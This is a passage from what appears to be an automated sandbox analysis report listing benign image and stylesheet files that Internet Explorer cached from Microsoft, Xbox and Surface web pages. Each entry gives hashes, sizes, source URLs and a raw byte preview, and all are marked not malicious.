                                                                                                                                                                                                              Preview: .PNG........IHDR...'...(.....}.......orNT..w.....IDATX..{L.u....|..I.#....p<;Z6.A.1>H....h...-:_........s0....4n*Yf..2....>.G[..l2......-m9~~...m#.....O..}.w...]...K}}}.F...p.x.......Hqu!..sGqJ.r.........%.....e.S..lk....0.N.I.iz9EQ...........`6>....u+f..n.^.a4.#.....@=.y;.T.@....>n`...T....O.+L.V?...X ..L...=.\].8.gs./R..P..4.sO/.\....xza..0...n....z....M..........>........[.j...a..9.....#~.g....c...R.+..SH..."...zxw.qtO..J.}.u4......~...[A..u[Fs.~..w....G.,...N4O7....\..v.>..x$...Yrg.#.....9BB\,.^.........)$....,.No7V r.w....Iow.6....3n...$..w.~pg..X>GHb. ..lq..vO.}.#[JR.M(...$o..6m.E.6........H....P..w...y4j.v..]...Mp........1.........C......0.F..>...uQ..k...=...'Q$...d.An...F.ucu.K..8?7......U/.%n...$........4..}......B.-,..|...Y\y5U..............'>....c/w.U..W.)B......[K..|\I'....[RS..n..O.>V...r....x.E.[.Zs.Z!3.....w.~....EE.iiiV.X.egg....,{...M....{.f...l.{.pS..........g.T.+...GKZ....>.f...%C...#.N....O.....o=6....lk.m.....?'.j...)|..rj).GQ.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RE4qVmr[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 38 x 40, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):1433
                                                                                                                                                                                                              Entropy (8bit):7.839635810424927
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:c9uFRhawKt3sNm+DAOSqahJpzl3E0ie38H1IOEkyNtB6rcRpkkFVEn464STpB:cYQwKt3FNT7vRlH8VILNtIrcRfE2ST7
                                                                                                                                                                                                              MD5:3500815BB3286A8225DA4AC1BDD503BB
                                                                                                                                                                                                              SHA1:34D65AA8A742290A37C069613608324D4A8EE1EC
                                                                                                                                                                                                              SHA-256:F607086E980646466309996E4B77BC9D3A0A5C98A6274185562E6455454F952C
                                                                                                                                                                                                              SHA-512:62E4A9D59D87B0ED2759172778CA6A13C0C5E18AE4293126208344AE6D82DAF2673C6BB95B1607577939ADDDE39033725FCBDC9918708A49F4CDCC6F55FF403D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4qVmr?ver=bafb&q=90&h=40&b=%23FFFFFFFF&aim=true
                                                                                                                                                                                                              Preview: .PNG........IHDR...&...(......7......pHYs..........+.....KIDATx..Mh$E..{.3!..l .K$"........<....!""......]QaO..k@..4.7$..^.....A.`2.ft3.......{.3.....^....z..;.u.....p.Z&..hjj.V3...V....d.r.|.......x5.\G...F.......{5.\..%.....E..40.......&........v..`\...>jS..8E.z..Z..56...".4..2>.N........%%.y.LF...W.s..V.....Zs.F.I..D"j9.w.B.g.Q....,.#....~.eq....M.1k_.....G...s.....)dJ.y..^..S>...........%.|1..._5.....r...V_....8.!.8...*.-...Y`:..P...)=h$..>mll<.q<... ............4~6B.F.qd^.........y|.x...q...Z......y.z".J%.... ........>E*..a.X.f^...(....G.s..e..M;.........".(U.T..l...e}....(1R]YY9*...........]...D...<.O.........z.......(%...q.....?...;... ....c.L.1.%8>ElWG944.W~..d`..=....Wa?L..rOOO.[{D,....t..|m......H......a......x.b...}...'...RN..../,,.a. .9..d'.%F...........(=..c....?f#......+Y...l.x@/p.'.h. ....:o...nagg..+........YE.&.o..5}.M.Z.=,0].S.._]].._a.).(..;JN....>ZZZ.H.rccc.-.....a...wyvv.._.......-.|X`R...........p..y.i....*...h....5..
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RE4r3A9[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 45 x 40, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):1053
                                                                                                                                                                                                              Entropy (8bit):7.7017669448567725
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:UTzrCAVU1QZa/yYuzGO/YflmFO9gW3ltYXg3Z4WoTUEkqkU:UP5UbuzGhoF4hltggloTU5qkU
                                                                                                                                                                                                              MD5:4B6CAF9BD4AEBE8C13A8AD1D5D45EFA2
                                                                                                                                                                                                              SHA1:288469CB0D517195D51E73D2FD69A8061AA41F23
                                                                                                                                                                                                              SHA-256:181B0B8418F439177E62EB4802E0C6970289F8BC111C46CD533B8AFEEBC0E53F
                                                                                                                                                                                                              SHA-512:E0E9AC774E6090D11294743311A854BFE070DA9F90804F34F3F674AB7085B097188EE987F7FF5DB6947CE626666CF4DF08D45BBE49A971D0A6B68619488ABB06
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4r3A9?ver=e442&q=90&h=40&b=%23FFFFFFFF&aim=true
                                                                                                                                                                                                              Preview: .PNG........IHDR...-...(.....j.s)....pHYs..........+......IDATx...KTA....^..`....Q!..=...D...[?...^..j....!d..`..d!.....B[>.b... ..N.v.q..]W.......3g.|..3sg.LH......\.'Im.W...e..~2. a......1PAc..yC$^R..?^.{...i"2...l..A.;.d#.#...h.x.]=t{.......x..}.z+~...s..Q.c}.G..z...#)..........Z.K$..ty...IX].oA)t.s..E..#.=.5.i.j...E...B......{.>..Iu .v).>Hy.&.w e..1...R...!Ix.$......... )...ra+n..[..M.n.. .O...Tn..T.=..B.? .#8.z..rF._.-.nR..>.......nZ.F.........T.c...r}....I.H..)u........#...p......_D...Q_.~...<.!l..hw...2.$...0.mT..h.S.e.e.e..g..${....U9Yr...x.|\..l...A.Vdrr..s(.Q.v.)|>.lMM..p.z||.....\G....\..2,..K.[.%..`6.G......B...g..u.9.@...RM...hE5..a.) .*.a..0...'.}Bi...<G......Q....G>qa.n....y...ivvv~hh(.n..fKKKnYYY.i.1..@`.9.f6.....O....a..A.....V.9.'&&~..h4j.........&..j....b,..Nx...l.....o.Xz.Z`.p.8.i....t... .......y..`".V(..g....4.5...644......L..++[9p....g.......A;.|..x..VQtn....*.y.6..|]]....(.v...}.....#0....Q^....;$n.E`..u...u.6.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RE4r3Ax[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 48 x 40, 8-bit colormap, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):1457
                                                                                                                                                                                                              Entropy (8bit):6.509683425236676
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:XCZFkAkAkEAuTJ/T9/hFGfcHfrOB15w2+mUfALEMIxugwrIjAqr1He+qN9gUGrx:XCZFkAkAkEAuKMfCB15w2txFIYgwcjOq
                                                                                                                                                                                                              MD5:8BF9BAE3BCFC4D8B196A16A6950E4359
                                                                                                                                                                                                              SHA1:D51C6A5FEBF4864D00064A0E7314C4C0041E28BF
                                                                                                                                                                                                              SHA-256:2245A9D218E201CD799A66903B09C4FB0B18F90527DF2C0E84E0667D26C3D15F
                                                                                                                                                                                                              SHA-512:55A59C3A4DA68D8B630110C09DA39228B67694DEB1ED4F9E2E262A5217ECF170DF57C08BDC68E2CCB5625D30147ED7CC5359658D92D890203EF254A9FA561B4F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4r3Ax?ver=2f9b&q=90&h=40&b=%23FFFFFFFF&aim=true
                                                                                                                                                                                                              Preview: .PNG........IHDR...0...(......Y.C...vPLTE...............................................................................................................................................................................................................................................................................///.........////////////...///.............../////////---/////////---....../////////"""/////////.........///.../////////...---...//////---,,,/////////....../////////.............---/////////---...//////...H..m..W..o..G..*39......///....w..x..x..x.+++...///...---.x..x.,,,....x..x..x..../////////,,,.x./////////,,,...//////---,,,...///...///....v..u..v..x..I;.....tRNS..T.E.L....?.M...?..>.L.K.=J.<.J.....;.I.H.:..6.5R...7.....4..V...1.../.;..,....8...+Y...+!.H..u.6..*......t.......q).....q.........o..~..........n..}.."...!.c..R.....f.X..x.g....h.....iZ.j....k].6,.....orNT..w.....IDAT8.c`.....YX...l....Osq.......4.....V...S..""._..8.iT ..G..$.r..)i....=...H.a*.W.......(.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RE4r4UB[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 37x37, segment length 16, progressive, precision 8, 380x214, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):20529
                                                                                                                                                                                                              Entropy (8bit):7.973272481981092
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:AzGbEu6upHgCDwwCcehCz35B4V46He+swowQXSWD2KufIhnObGd/Ues:RbEApA+bwhCzH4K6fpyiu2rfIhO66
                                                                                                                                                                                                              MD5:B3EB6D52D47262E280B8210903402727
                                                                                                                                                                                                              SHA1:D079598F6AFEAB4BD0E9EDBFD4900EBA15B1A662
                                                                                                                                                                                                              SHA-256:F9F6F1A3F13B36571BC76642E6364E693A65FC5EABC8392F04757C6B8AFAD719
                                                                                                                                                                                                              SHA-512:78BB0D1A76E4F8E4295421ABBB83F9AB2555BD4D74B0127A7DE8F6BBC0CEEF242D698158E63DEFABC198EC654C9F46AAF3E8CA7AC9542F80CA7BC7FABEC75160
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4r4UB?ver=3307&q=90&m=6&h=214&w=380&b=%23FFFFFFFF&l=f&o=t&x=558&y=161&aim=true
                                                                                                                                                                                                              Preview: ......JFIF.....%.%.............................................................&""&0-0>>T.......................................................&""&0-0>>T........|.."................................................... ....8n...I....9W.G...=.T>...@B.2d......V..}..[I..<.jq.cN...n......V..2M.s..5....5.L.[..m.q..7s.I5....)...-r.(F..:...8R......W.*..W..k.~..H...H......H]U...4..F.......t,..h..!Fd.EEo....<_.n.L......u...$.............W...4Fp....J~./UUx.....~.e#.u..Y{"w.rF..v3....r..!.\.>U..6{..s....pk.l..\....B.e$k..ZU..Z1.."..a..L+..K.....Re.."..*..F'...6.1.`I.N...Q....P.u....R!`.<].$n.m..+. .r..F@Q:>......4....,...G..S].X..4...8V]*H$.ok|.mit.....hL....k........>7@.E.$..2Ka~t.S.N....2.u..2>D........h...LzH..Z0.B...K..(..W..u6.."...<..........%......*...0v{B......!..~k.o...M$....K..|...."84...7..Y~.PUf..W...!....|}...}.Gpx,....W.XG"......r~.RV;..V5.i..'...B.....y.4.u...M..Z.a...U.d.....z[CK..5J.A..$..P..F...T...(4..z....M....:e...lx.......O..u
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RWlwWG[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 40 x 40, 8-bit gray+alpha, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):161
                                                                                                                                                                                                              Entropy (8bit):6.028507930853413
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:yionv//thPlVXtJZ1MtMlAAG6r+KvWk6TCd5wqxkYlia8UxpXglwLnXlll2g1p:6v/lhPnMtk0y+JzOdCqfx5gqLn1lkup
                                                                                                                                                                                                              MD5:0F8DFFB3A4CFD4FB111DE9F38F98A14D
                                                                                                                                                                                                              SHA1:A7F69433BF61E7485983998CFC65CBA041431DF1
                                                                                                                                                                                                              SHA-256:F8DE6A07EFA35E1BC85384F986766340952B5F1D56DC1EDD9E2473D72496C908
                                                                                                                                                                                                              SHA-512:FF83E0259C8F7232610B475D294059B1D2D66F07506A3A042F784F44765FB0218F5FE5E91C8C1713459C80AEB2E6DB28C2E9037ED50DC8436A640373F7B08D4D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWlwWG?ver=460a&q=90&m=6&h=40&w=40&b=%23FFFFFFFF&l=f&o=t&aim=true
                                                                                                                                                                                                              Preview: .PNG........IHDR...(...(.....&.p.....orNT..w....[IDATH.c`...`p.......`...bJ.{d..S....6.a..Q.G..5p.@L..Q..G6...1.?U.e..................G........P.....IEND.B`.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\SOC-Facebook[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 25 x 32, 4-bit colormap, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):240
                                                                                                                                                                                                              Entropy (8bit):6.188461054878128
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:6v/lhPWmCXqP1eHa848kifdrrm0eZIYzrEdg2At2up:6v/7eHrHpFki1rq0eZzrWgjt2c
                                                                                                                                                                                                              MD5:44352B4A87345DCE6414CCA0F0693755
                                                                                                                                                                                                              SHA1:6504E7370B22BD5C767E295B33A02AFA10C24FE6
                                                                                                                                                                                                              SHA-256:1E6A1DB4E61EFCA3846B5A27F5ABB9ED776B935E90424CD55AE1F2CE92D73E15
                                                                                                                                                                                                              SHA-512:85FD6F89DBEEB4CF569E8F5FC1CC4941FD0C9953E58F0AC9D9C4C08D8D4EA1192E74E77F22ECF2A357856DEF0946B0C1DEAD44186BA25D963E63B91DF588CEEC
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://support.microsoft.com/SocImages/SOC-Facebook.png
                                                                                                                                                                                                              Preview: .PNG........IHDR....... ........5...-PLTE...w..{{{|||...{||wwwy{{y{{||||||...y||z}}|}}g..R....tRNS.@.... .`0.p......dIDAT..c ........;8x.........7).!xG.........\H*.1........."C.B.....y,p^....,.)..%0p.....fccK....-F...s......IEND.B`.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\SOC-Linkedin[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 24 x 32, 8-bit colormap, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):270
                                                                                                                                                                                                              Entropy (8bit):6.518823700284674
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:6v/lhPktaIgpXpnZwaqY3Re8+Rvkc0wjm4ON0v20YnU//jp:6v/7Mta/pXpZwaj3IrXO0vTqUN
                                                                                                                                                                                                              MD5:A7BBC240D563DB6D4F2211B9BB6D0E47
                                                                                                                                                                                                              SHA1:3FBDF9C7B2378BC706013B52B355BF13346448A8
                                                                                                                                                                                                              SHA-256:292C4CABD66C25753CE8BBFA1E8A32B47703AB1F809670B056D5B59CFCAF5FB8
                                                                                                                                                                                                              SHA-512:693CBC364F42C1E1C75672FB84FE6A26B31A418F67ADDA732264550FB1B4E807DB8D6B33B6BB345A11B324CD253895653396324C29EE034CC8C78E77D3996B1A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://support.microsoft.com/SocImages/SOC-Linkedin.png
                                                                                                                                                                                                              Preview: .PNG........IHDR....... .....?.H....BPLTE...w..|||...y{{{||y|||||z}}www|}}...........................PF.7....tRNS.@.0...p 6&.:...qIDAT(.....0.E.8.{.....ju!H..z.-.@..2UFMz.a5H....p.'..........XI...?g8...^.A...3X.h..P...GT.. ].s...:...j.@....n........IEND.B`.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\SOC-Mail[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 32 x 32, 8-bit colormap, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):284
                                                                                                                                                                                                              Entropy (8bit):6.545045554632694
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:6v/lhPkdsEejylMSB8POk1SljdAOh06VJJtBafxJ0lX0hRCAp:6v/7sW3jk8POk6j9PJjt1A4K
                                                                                                                                                                                                              MD5:3C7700243B9493C12B1B682CAA47F5F2
                                                                                                                                                                                                              SHA1:D522ED9D356837FED083E4D69262C749F4807FC0
                                                                                                                                                                                                              SHA-256:8EF6E4F16AE501AD18088960B404AF57871BE54EA8A0C7088872B88EB5DC2B02
                                                                                                                                                                                                              SHA-512:F01BF3AB533D6CB7CCF5A26C2F23526BC107B79C9379ABC88922402DC044DFA852E3FF934415476960C8FFE756EE9988B758D602AB1FC6756ADEA50B603050FB
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://support.microsoft.com/SocImages/SOC-Mail.png
                                                                                                                                                                                                              Preview: .PNG........IHDR... ... .....D......3PLTE...{{{|||y{{|||w..{||wwwy{{...y|||||z}}z}}|||...|}}.......tRNS....`@. ....pP0.jdv....IDAT8..... .E..&.....V..&/'.$g...s..3......tJ.8...Mh.k.\.o.c;D^.......n...fP......T...p...1....vA....&n...f.]X.#/....A.....:....._s....d......IEND.B`.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\Snow-Bird-Custom-modules[1].css
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):29132
                                                                                                                                                                                                              Entropy (8bit):4.842443342282901
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:04E5RsBkVWy9puOokG7IFFK3M1QG1EN/uaYocC+wRKuu9L7wWYIpKF5MX5UJxGLN:04UoVMzOA
                                                                                                                                                                                                              MD5:7597EF4D84D0FF352E80268BE72F6693
                                                                                                                                                                                                              SHA1:86FC045D50A73020C7D557F2C2432AECBB12A220
                                                                                                                                                                                                              SHA-256:183CD78314AF6E0509772F6B68617DA11AAA4F978E6E40BB9AF76DFF09267A4E
                                                                                                                                                                                                              SHA-512:C1F56047FAFE606A1E0B2B71E35799385CC2AA79A26628BFECB0F9741BB5C44C810A5D68FB0F6D82F513A57C6B0071A5F1B25D603FC3DADBD9D75B3DC0EFBD3E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.xbox.com/en-US/global-resources/templates/MWF/CSS/Snow-Bird-Custom-modules.css
                                                                                                                                                                                                              Preview: html, body, div, span, object, iframe,.h1, h2, h3, h4, h5, h6, p, blockquote, pre,.abbr, address, cite, code,.del, dfn, em, img, ins, kbd, q, samp,.small, strong, sub, sup, var,.b, i,.dl, dt, dd, ol, ul, li,.fieldset, form, label, legend,.table, caption, tbody, tfoot, thead, tr, th, td,.article, aside, canvas, details, figcaption, figure,.footer, header, hgroup, menu, nav, section, summary,.time, mark, audio, video {. margin:0;. padding:0;. border:0;. outline:0;. font-size:100%;. /* vertical-align:baseline; . background:transparent;*/.}../*body {. line-height:1;.} */..article,aside,details,figcaption,figure,.footer,header,hgroup,menu,nav,section {. display:block;.}....custom-sb-hero.green .content-div,..custom-sb-hero.green [data-grid~="col-12"] {. background-color: #107c10;.}...custom-sb-hero.dark-gray .content-div,..custom-sb-hero.dark-gray [data-grid~="col-12"] {. background-color: #171717;.}...custom-sb-hero.gray .content-div,..custom-sb-hero.gray [d
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\Surface_Home_HMC_HighlightFeature_Spring_21_V2[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:[TIFF image data, little-endian, direntries=0], baseline, precision 8, 1600x600, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):75414
                                                                                                                                                                                                              Entropy (8bit):7.3636698904336315
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:PLZBwtSglxk4Lo4JmT3YQe3skpF1fPPOJxPl:HbsoQlQe3s8H+xd
                                                                                                                                                                                                              MD5:112EF95C8375FBCED00BA567E44F3CE5
                                                                                                                                                                                                              SHA1:A0297BEB47AB6976C2A6886DF4D598C898960D41
                                                                                                                                                                                                              SHA-256:3306D36791FC2A94760D482B504ADC1173B739C67855105BB5FE31BD83861C22
                                                                                                                                                                                                              SHA-512:A6793280ED3E8BF6DEF576E99AC2D60AC74BD27DC54FF31435650E43F3AE73F9F9E24EB6EF9FF3B16EBDB7EED46CC7BFDB292B38AA45201A52CBBFE9B791FD96
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSImages/Surface_Home_HMC_HighlightFeature_Spring_21_V2.jpg?version=bc154a3d-f415-818e-9521-0242aefad3df
                                                                                                                                                                                                              Preview: ......Exif..II*.................Ducky.......K......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.164753, 2021/02/15-11:52:13 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:16C0076685F911EB9AD38DD4886F9E49" xmpMM:InstanceID="xmp.iid:16C0076585F911EB9AD38DD4886F9E49" xmp:CreatorTool="Adobe Photoshop 2021 Macintosh"> <xmpMM:DerivedFrom stRef:instanceID="6E025798B4DD53C612FE1774BCF8EDF9" stRef:documentID="6E025798B4DD53C612FE1774BCF8EDF9"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d................................................................................................................................................
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\Surface_Home_Hero_Spring_21_color_V1[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1920x720, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):90291
                                                                                                                                                                                                              Entropy (8bit):7.8974920099993415
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:8Nl1BLC7px1ZsC9vC/LCLUMYLop2gEMgKlDnafFKhTjZGHbqrJ4RstXF8m11LQyZ:8NlmfvsGv0UUFcUhMhlDaFKhTjQWr6Ap
                                                                                                                                                                                                              MD5:49F61229D41A16BC4CB3207BDAFF459B
                                                                                                                                                                                                              SHA1:EEB2AE255DB97C20CD0CC7876E456B7A45D3E86F
                                                                                                                                                                                                              SHA-256:6B1B23D66D6842FAE03A6E21C159CEF8F054FB7925D316B222397E5D175420F4
                                                                                                                                                                                                              SHA-512:DE2E95AAF8A83749F75FE427B88934AF27FCD14F8D7822520AE317719D626D2D2DEFD0A4C628611937CFA25BCBBE8E9183060211FE4AF24392C5340FF8FDAE1F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSImages/Surface_Home_Hero_Spring_21_color_V1.jpg?version=672b6412-c20f-66ff-49d7-10347a5ab07e
                                                                                                                                                                                                              Preview: ......JFIF..............................................................................................................................................................................................................@.I$...IU$..$.*.5.C ...U.4h.&.&..D.H.H$P .A .A .I..@.H4I$.UU.a.UU.2.uYq.WF..K.%.%.wwwwwwww....r....ws...I .I*..Q.CR.CUU..UF.5T!4h.M.I$.I$.I... .. .H .A$.D.h.h.P...!.Cp.....2.IrK..K..........E......w.wrI$.d.C$.Q.CP.F.P.5Th.F."...h...$Q....H$.A .A .H$.E..4.......UUUT.|.S...IteUT..\..].....)w.)w.)w..\.....$.CRI!.I.I(.d..J.h.Q.h.h.$.I$... .. .A .A .H$.@.I.I$.a.*...UUU\...C.Eur..D.%.r....]....w......r....I.I$..I..Q.R....CUF...4h.$.@.h...I..A.....A..A..9....I...*....UW98..{4MH...G..}.T.r].......qIwr....r.)..$.HjI%T.J2HjUHj...j....&..@.$.I.(P ....$.H .H$.. .I$. .UQ.TeUUJ....;..&..5...o....@MT....].....\..w....r..^.I(.$.I$.$....2..j.......&.&..h.A$.H ....I..A..H$.I$...5(.2.T..~.G..$..?..5........`.j].Wwww..R.]......]....$...I..HjI..J0...U....&..I4I$.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\background_gradient[1]
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 1x800, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):453
                                                                                                                                                                                                              Entropy (8bit):5.019973044227213
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:3llVuiPjlXJYhg5suRd8PImMo23C/kHrJ8yA/NIeYoWg78C/vTFvbKLAh3:V/XPYhiPRd8j7+9LoIrobtHTdbKi
                                                                                                                                                                                                              MD5:20F0110ED5E4E0D5384A496E4880139B
                                                                                                                                                                                                              SHA1:51F5FC61D8BF19100DF0F8AADAA57FCD9C086255
                                                                                                                                                                                                              SHA-256:1471693BE91E53C2640FE7BAEECBC624530B088444222D93F2815DFCE1865D5B
                                                                                                                                                                                                              SHA-512:5F52C117E346111D99D3B642926139178A80B9EC03147C00E27F07AAB47FE38E9319FE983444F3E0E36DEF1E86DD7C56C25E44B14EFDC3F13B45EDEDA064DB5A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:res://ieframe.dll/background_gradient.jpg
                                                                                                                                                                                                              Preview: ......JFIF.....d.d......Ducky.......P......Adobe.d................................................................................................................................................. ...............W..............................................................Qa.................................?......%.....x......s...Z.......j.T.wz.6...X.@... V.3tM...P@.u.%...m..D.25...T...F.........p......A..........BP..qD.(.........ntH.@......h?..
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\bd6e23ef-b638-4595-bcf8-e2929e239555[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, baseline, precision 8, 1083x1222, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):233621
                                                                                                                                                                                                              Entropy (8bit):7.967438569681091
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6144:wDCSRX7oyXFCsAOzzc4mGpDdHnCVKJGFhJI4dsJuuwOrs:wDCwroiCsAOU4mG1VCVIGhI4dsJBwYs
                                                                                                                                                                                                              MD5:E47F1F8CE521DBF16999ABEF5FDF6187
                                                                                                                                                                                                              SHA1:5F37C256C3A65AFDB57CE69CBF61213829406879
                                                                                                                                                                                                              SHA-256:147DE3CDD148910812BD26FF1A95E0736B22A3BB71078F32419959D92136EFBF
                                                                                                                                                                                                              SHA-512:42B97DBE8DA3FC0F17896FDD127E1EC1CE6E5596AE76D592DCC9A48EB4F6F3E653C87D4A52B8A26E7CD867D6FE4D94A36F9E18593AEA37B2683F46F356B0CFA4
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://compass-ssl.xbox.com/assets/bd/6e/bd6e23ef-b638-4595-bcf8-e2929e239555.jpg?n=Subnautica-Below-Zero_Large-tout-0_1083x1222.jpg
